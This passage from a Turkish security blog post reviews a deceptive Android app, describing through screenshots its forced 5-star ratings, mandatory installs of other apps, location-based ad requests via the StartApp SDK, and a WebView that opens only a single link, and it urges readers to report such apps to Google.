<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiS6D34dB5DL4oHCMpBNP45rF60yruCCZ94CBoFbUssbTAzDyCnuKZvOE3EmsfGeW8HSpd7CeT9krL5bVE0Z4fm9DP9sbDB7Y6lr2UFKHQwZHAF_mL6XjxvBjNk4EK_Mis0ZQPQXcohtrU/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiS6D34dB5DL4oHCMpBNP45rF60yruCCZ94CBoFbUssbTAzDyCnuKZvOE3EmsfGeW8HSpd7CeT9krL5bVE0Z4fm9DP9sbDB7Y6lr2UFKHQwZHAF_mL6XjxvBjNk4EK_Mis0ZQPQXcohtrU/s640/3.PNG" width="640" /></a></div>
Yine yukarıda uygulamayı çalıştırmak için 5 yıldız vermeniz gerekmektedir gibi bir dayatma mevcut ama aslında böyle bir zorunluluk yok amac 5 yıldızları cogaltarak play aramalarında üst sıralarda cıkarak daha fazla insanın indirmesini saglamak. Yine hemen üzerinde 3 adet uygulamayı zorunlu indirmeniz diretilmektedir.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_ONcK247xlY-CJGPWV6wxdqpRIeNjMUkuViLjb3KpOe-WL1WVfaWE-NE6jGQKr26abGBgf5r8qnAQKTAUTtHa3oxkmZVMPoQGsXapEh69xvyjdYGCpxd_duq5Go_r7mRKajAuEf-sJkY/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_ONcK247xlY-CJGPWV6wxdqpRIeNjMUkuViLjb3KpOe-WL1WVfaWE-NE6jGQKr26abGBgf5r8qnAQKTAUTtHa3oxkmZVMPoQGsXapEh69xvyjdYGCpxd_duq5Go_r7mRKajAuEf-sJkY/s1600/4.PNG" /></a></div>
Yukarıda startapp uygulamasının GetAdRequest Metodu ile sizin konumunuzu kullanarak uygun reklamlara istek yapmasının sağlandıgını gormektesiniz. Longtitude Latitude verileri sayesinde konumuzu tespit ederek reklam isteğinde bulunuyorlar.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHQEiB1A68lbnjLuJKFd9WBOF1ARBieB_xdhARDqQqU-y9hNiNiXmsRmBOuuRee8wJhii0Cz9bhoVR_-NF4V1Vyo48isUra5rh1QV5kKpD19onCbQcBtez_NDcLTDVU5QVivMvof88Qlw/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHQEiB1A68lbnjLuJKFd9WBOF1ARBieB_xdhARDqQqU-y9hNiNiXmsRmBOuuRee8wJhii0Cz9bhoVR_-NF4V1Vyo48isUra5rh1QV5kKpD19onCbQcBtez_NDcLTDVU5QVivMvof88Qlw/s1600/5.PNG" /></a></div>
Uygulamadan beklediğiniz içeriği tersine sadece ve sadece yukarıdaki linki Webview ile acmakta.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw32xZwPZZNngIPgvIgoolCHUhqTinuvoekGuIQGoevqo8S7rBTXIvMyQO565zH2qr7oTK7HWWXreqv1oR9AKKM2M-6phHVqSeuf3iLAO_3ReDIddXtrPDrbMqDsTyUF_vzFU_i2C2zN8/s1600/6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw32xZwPZZNngIPgvIgoolCHUhqTinuvoekGuIQGoevqo8S7rBTXIvMyQO565zH2qr7oTK7HWWXreqv1oR9AKKM2M-6phHVqSeuf3iLAO_3ReDIddXtrPDrbMqDsTyUF_vzFU_i2C2zN8/s320/6.PNG" width="320" /></a></div>
Uygulamanın Download Ekranından bir Görüntü.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWVroUYpMXOb23NMjN67hcz4JEFj6_EW-JVETKMzBJrzE7M4KvyQvapnlpyZ3U2BY5D6gMFL8sYSlHNavBrBL1UBmqYNcCQO0Vd3naYZbgfh8xvYjZ5-FFuNFoPyG1oWN2nPmNX7fMoRg/s1600/7.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="81" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWVroUYpMXOb23NMjN67hcz4JEFj6_EW-JVETKMzBJrzE7M4KvyQvapnlpyZ3U2BY5D6gMFL8sYSlHNavBrBL1UBmqYNcCQO0Vd3naYZbgfh8xvYjZ5-FFuNFoPyG1oWN2nPmNX7fMoRg/s320/7.PNG" width="320" /></a></div>
Yine aynı yayımcıya ait diğer uygulamalar. Yapmanız gerek bu tip uygulamaları google a sikayet ederek kaldırılmasını saglamaktır. Birçok bu tip inceleme ve Siber Güvenlik Dökümanıyla tekrardan görüşmek dileğiyle.....<br />
<br />
Akın Tosunlar.</div>
Anonymoushttp://www.blogger.com/profile/00334229859513933055noreply@blogger.com0